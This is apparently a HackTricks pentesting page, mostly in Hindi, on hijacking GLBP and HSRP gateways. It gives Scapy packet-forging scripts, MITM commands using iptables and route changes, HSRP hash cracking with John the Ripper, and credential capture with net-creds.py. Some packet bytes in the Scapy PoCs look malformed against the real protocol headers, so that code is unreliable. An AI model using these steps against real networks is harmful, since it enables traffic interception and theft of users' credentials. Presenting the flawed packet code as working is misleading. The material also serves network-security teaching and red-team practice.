GLBP & HSRP Attacks

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

FHRP Hijacking Overview

Insights into FHRP

FHRP को नेटवर्क की मजबूती प्रदान करने के लिए डिजाइन किया गया है — यह कई routers को एक वर्चुअल यूनिट में मिला कर load distribution और fault tolerance बढ़ाता है। Cisco Systems ने इस सूट में प्रमुख प्रोटोकॉल पेश किए हैं, जैसे GLBP और HSRP।

GLBP Protocol Insights

Cisco का बनाया हुआ GLBP TCP/IP स्टैक पर काम करता है और संचार के लिए UDP पोर्ट 3222 का उपयोग करता है। GLBP समूह के routers हर 3 सेकंड पर “hello” पैकेट्स का आदान‑प्रदान करते हैं। अगर कोई router 10 सेकंड तक ये पैकेट्स नहीं भेजता, तो उसे ऑफ़लाइन माना जाता है। हालांकि, ये timers स्थिर नहीं होते और इन्हें बदला जा सकता है।

GLBP for IPv6 multicast FF02::66 का उपयोग करता है UDP/3222 पर, और वर्चुअल MAC फॉर्मेट 0007.b4xx.xxyy हो जाता है (AVF ID अंतिम बाइट में होता है)। Timing और attack surface IPv4 के समान रहते हैं, इसलिए hijack techniques dual‑stack नेटवर्क्स में भी काम करती हैं।

GLBP Operations and Load Distribution

GLBP एक single virtual IP के साथ multiple virtual MAC addresses का उपयोग करके routers के बीच load distribution सक्षम करता है। एक GLBP समूह में हर router packet forwarding में शामिल होता है। HSRP/VRRP की तुलना में, GLBP कई mechanisms के जरिए वास्तविक load balancing प्रदान करता है:

  • Host-Dependent Load Balancing: किसी host को एक स्थिर AVF MAC address असाइन रखता है, जो स्थिर NAT कॉन्फ़िगरेशन के लिए आवश्यक है।
  • Round-Robin Load Balancing: डिफ़ॉल्ट तरीका, requesting hosts के बीच AVF MAC address को बारी‑बारी असाइन करता है।
  • Weighted Round-Robin Load Balancing: पहले से परिभाषित “Weight” मेट्रिक्स के आधार पर load distribute करता है।

Key Components and Terminologies in GLBP

  • AVG (Active Virtual Gateway): मुख्य router, जो peer routers को MAC addresses allocate करने के लिए जिम्मेदार होता है।
  • AVF (Active Virtual Forwarder): नेटवर्क ट्रैफ़िक को manage करने के लिए निर्दिष्ट किया गया router।
  • GLBP Priority: AVG तय करने वाला मेट्रिक, जिसकी default value 100 होती है और यह 1 से 255 के बीच होता है।
  • GLBP Weight: किसी router पर मौजूदा लोड को दर्शाता है, जिसे मैन्युअली या Object Tracking के माध्यम से समायोजित किया जा सकता है।
  • GLBP Virtual IP Address: नेटवर्क के लिए default gateway के रूप में काम करता है जो सभी जुड़े उपकरणों द्वारा उपयोग किया जाता है।

इंटरैक्शन के लिए GLBP रिज़र्व्ड multicast address 224.0.0.102 और UDP port 3222 का उपयोग करता है। Routers हर 3‑second पर “hello” पैकेट भेजते हैं, और अगर 10‑second के भीतर कोई पैकेट मिस हो जाए तो उन्हें non‑operational माना जाता है।

GLBP Attack Mechanism

एक attacker GLBP पैकेट भेजकर primary router बन सकता है जिसमें highest priority value (255) सेट हो। इससे DoS या MITM attacks हो सकते हैं, जिससे ट्रैफ़िक intercept या redirect किया जा सकता है।

Practical GLBP hijack with Scapy (short PoC)

from scapy.all import *

vip = "10.10.100.254"          # learned from sniffing
pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
b"\x01\x00\xff\x64"      # Version=1, Opcode=Hello, Priority=255, Weight=100
)
send(pkt, iface="eth0", loop=1, inter=1)

payload bytes को GLBP header (version/opcode/priority/weight/VRID) की नकल करने के लिए तैयार करें। फ़्रेम को loop करने से आप AVG election जीत जाते हैं यदि authentication मौजूद नहीं है।

Loki के साथ GLBP Attack निष्पादित करना

Loki priority और weight को 255 पर सेट करके packet inject कर के GLBP attack कर सकता है। हमले से पहले के कदमों में virtual IP address, authentication presence, और router priority values जैसी जानकारी इकट्ठा करना शामिल है, जो tools जैसे Wireshark से प्राप्त की जाती है।

हमले के चरण:

  1. promiscuous mode पर स्विच करें और IP forwarding सक्षम करें।
  2. लक्षित router की पहचान करें और उसका IP प्राप्त करें।
  3. Gratuitous ARP उत्पन्न करें।
  4. AVG की नकल करते हुए एक malicious GLBP packet inject करें।
  5. attacker के network interface को एक secondary IP address असाइन करें, जो GLBP virtual IP को mirror करे।
  6. पूर्ण ट्रैफ़िक visibility के लिए SNAT लागू करें।
  7. routing समायोजित करें ताकि original AVG router के माध्यम से इंटरनेट एक्सेस जारी रहे।

इन चरणों का पालन करके, attacker खुद को “man in the middle” की स्थिति में रखता है, जो network traffic — जिसमें unencrypted या sensitive data शामिल है — intercept और analyze करने में सक्षम होता है।

डेमो के लिए, यहाँ आवश्यक command snippets दिए गए हैं:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network.

HSRP Hijacking का पैसिव स्पष्टीकरण और कमांड विवरण

HSRP (Hot Standby Router/Redundancy Protocol) का अवलोकन

HSRP एक Cisco proprietary protocol है जो network gateway redundancy के लिए डिज़ाइन किया गया है। यह कई physical routers को एक shared IP address वाले single logical unit में कॉन्फ़िगर करने की अनुमति देता है। इस logical unit का प्रबंधन एक primary router द्वारा किया जाता है जो ट्रैफ़िक के निर्देशन के लिए ज़िम्मेदार होता है। GLBP के विपरीत, जो load balancing के लिए priority और weight जैसे metrics का उपयोग करता है, HSRP ट्रैफ़िक प्रबंधन के लिए एक single active router पर निर्भर करता है।

HSRPv1 uses multicast 224.0.0.2 and virtual MAC 0000.0c07.acXX; HSRPv2 and HSRPv2 for IPv6 use 224.0.0.102 / FF02::66 and virtual MAC 0000.0c9f.fXXX. UDP destination port is 1985 for IPv4 and 2029 for IPv6.

HSRP में भूमिकाएँ और पदावली

  • HSRP Active Router: वह डिवाइस जो gateway के रूप में कार्य करता है और ट्रैफ़िक प्रवाह का प्रबंधन करता है।
  • HSRP Standby Router: एक बैकअप router, जो active router के फेल होने पर जिम्मेदारी संभालने के लिए तैयार रहता है।
  • HSRP Group: routers का एक सेट जो मिलकर एक single resilient virtual router बनाते हैं।
  • HSRP MAC Address: HSRP सेटअप में logical router को असाइन की गई virtual MAC address।
  • HSRP Virtual IP Address: HSRP group का virtual IP address, जो connected devices के लिए default gateway के रूप में काम करता है।

HSRP संस्करण

HSRP दो संस्करणों में आता है, HSRPv1 और HSRPv2, जो मुख्य रूप से group capacity, multicast IP उपयोग और virtual MAC address संरचना में भिन्न होते हैं। यह protocol service information exchange के लिए विशिष्ट multicast IP पतों का उपयोग करता है, और Hello packets हर 3 सेकंड में भेजे जाते हैं। यदि 10-सेकंड की अवधि में कोई packet प्राप्त नहीं होता है तो एक router को inactive माना जाता है।

HSRP Attack Mechanism

HSRP attacks में Active Router की भूमिका को जबरन takeover करने के लिए maximum priority value इंजेक्ट करना शामिल है। इससे Man-In-The-Middle (MITM) attack हो सकता है। attack से पहले आवश्यक कदमों में HSRP सेटअप के बारे में जानकारी इकट्ठा करना शामिल है, जिसे ट्रैफ़िक विश्लेषण के लिए Wireshark का उपयोग करके किया जा सकता है।

Quick HSRP takeover with Scapy

from scapy.all import *

vip = "10.10.100.1"
pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
b"\x00\x02\xff\x03\x00\x00\x00\x01"  # Hello, priority 255, group 1
)
send(pkt, iface="eth0", inter=1, loop=1)

यदि authentication configured नहीं है, उच्च प्राथमिकता के साथ लगातार hellos भेजने से peers को Speak/Listen राज्यों में मजबूर किया जा सकता है और आपको Active बनने की अनुमति मिलती है, जिससे ट्रैफ़िक आपके होस्ट के माध्यम से रीडायरेक्ट हो जाता है।

HSRP प्रमाणीकरण के विशेष मामले

  • Legacy plain-text auth आसानी से spoof किया जा सकता है।
  • MD5 authentication केवल HSRP payload को कवर करता है; crafted packets अभी भी control planes पर rate-limit/DoS कर सकते हैं। NX-OS releases पहले authenticated groups के खिलाफ DoS की अनुमति देते थे (देखें Cisco advisory CSCup11309)।
  • कई ISP / VPS shared VLANs पर, HSRPv1 multicasts tenants के लिए दिखाई देते हैं; बिना auth के आप जुड़कर और ट्रैफ़िक को preempt कर सकते हैं।

HSRP Authentication बाईपास करने के स्टेप्स

  1. HSRP डेटा वाला नेटवर्क ट्रैफ़िक .pcap फ़ाइल के रूप में सेव करें।
tcpdump -w hsrp_traffic.pcap
  1. hsrp2john.py का उपयोग करके .pcap फ़ाइल से MD5 हैश निकालें।
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
  1. John the Ripper का उपयोग करके MD5 हैश क्रैक करें।
john --wordlist=mywordlist.txt hsrp_hashes

Loki के साथ HSRP Injection का निष्पादन

  1. HSRP advertisements पहचानने के लिए Loki लॉन्च करें।
  2. नेटवर्क इंटरफ़ेस को promiscuous मोड में सेट करें और IP forwarding सक्षम करें।
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
  1. निश्चित router को लक्षित करने के लिए Loki का उपयोग करें, क्रैक किया हुआ HSRP पासवर्ड इनपुट करें, और Active Router की नकल करने के लिए आवश्यक कॉन्फ़िगरेशन करें।
  2. Active Router रोल प्राप्त करने के बाद, वास्तविक ट्रैफ़िक को intercept करने के लिए अपनी नेटवर्क इंटरफ़ेस और IP tables को कॉन्फ़िगर करें।
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  1. रूटिंग टेबल को संशोधित करके ट्रैफ़िक को पूर्व Active Router के माध्यम से रूट करें।
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
  1. Intercepted ट्रैफ़िक से क्रेडेंशियल capture करने के लिए net-creds.py या समान utility का उपयोग करें।
sudo python2 net-creds.py -i eth0

इन स्टेप्स को निष्पादित करने से हमलावर ट्रैफ़िक को intercept और manipulate करने की स्थिति में आ जाता है, जो GLBP hijacking की प्रक्रिया के समान है। यह redundancy protocols जैसे HSRP में मौजूद कमजोरी और मजबूत सुरक्षा उपायों की आवश्यकता को उजागर करता है।

संदर्भ

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें